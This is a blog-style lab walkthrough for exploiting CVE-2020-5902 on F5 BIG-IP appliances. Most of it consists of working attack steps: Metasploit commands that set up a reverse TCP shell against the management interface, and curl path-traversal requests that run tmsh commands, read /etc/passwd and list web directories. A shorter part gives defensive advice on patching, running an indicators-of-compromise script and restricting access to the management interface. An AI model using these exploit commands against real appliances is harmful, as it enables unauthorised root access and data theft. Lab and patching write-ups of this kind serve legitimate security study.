F5 load balancers are wildly popular so when this bug was publicly disclosed back in June it was a big deal. F5 was prompt to release patches for CVE-2020-5902 remote code execution within the Traffic Management User Interface of BIG-IP code. It’s a quiet Sunday afternoon so lets lab this vulnerability:
First off you will need a vulnerable F5 Big-IP Appliance (in this example we are running BIG-IP 220.127.116.11). I am running this lab in VMware Workstation on Windows. You will also need a Kali 2020 VM up to date. For simplicity sake make sure both the F5 VM and the Kali VM are on the same subnet.
Once you have the lab setup fire up your Kali VM and be sure to update metasploit with:
apt update && apt upgrade
Then launch metasploit:
msf5 > reload_all
This will update modules within Metasploit from the apt upgrade you just completed.
Lets fire up Metasploit and set our exploit up:
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set payload linux/x64/shell_reverse_tcp
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set LHOST 10.0.0.10
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set RHOST 10.0.0.199
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
OK so what did we do here? First off we set the exploit to use the remote code module for the F5 vulnerability. Then I proceeded to set the LHOST (Kali VM) and the RHOST (F5 VM) variables. Lastly we use the command ‘run’ to execute.
As you can see above the sucessful output using the shell_reverse_tcp payload. I run the command ‘whoami’ to confirm root access to the F5 Linux based OS.
By default the f5_bigip_tmui_rce module within Metasploit will use the meterpeter payload (linux/x64/meterpreter/reverse_tcp). I just found that one to not always be as reliable. Sometimes you have to execute the exploit serveral times for it connect back. Below is the output of using that payload, which with meterpreter has built in commands:
Above you can see the meterpreter output, I run the sysinfo command then drop to a shell and run some linux commands (whoami, pwd, uname -a).
Use this Indicators of Compromise script to check if your F5 was hit. This shell script was created by F5.
First and foremost – patch your version of the F5 BIG-IP software. If you have the VM appliances or physical hardware the process is generally the same:
1. Download the patched ISO (make sure the checksum matches, I can’t stress this enough). Install the ISO on a free / HA partition.
2. Re-activate your software license PRIOR to switching versions. Then switch versions installing the config.
Lock down the TMUI to source subnets that need access. Deny all other connections.
You can also use curl to test this vulnerability:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/'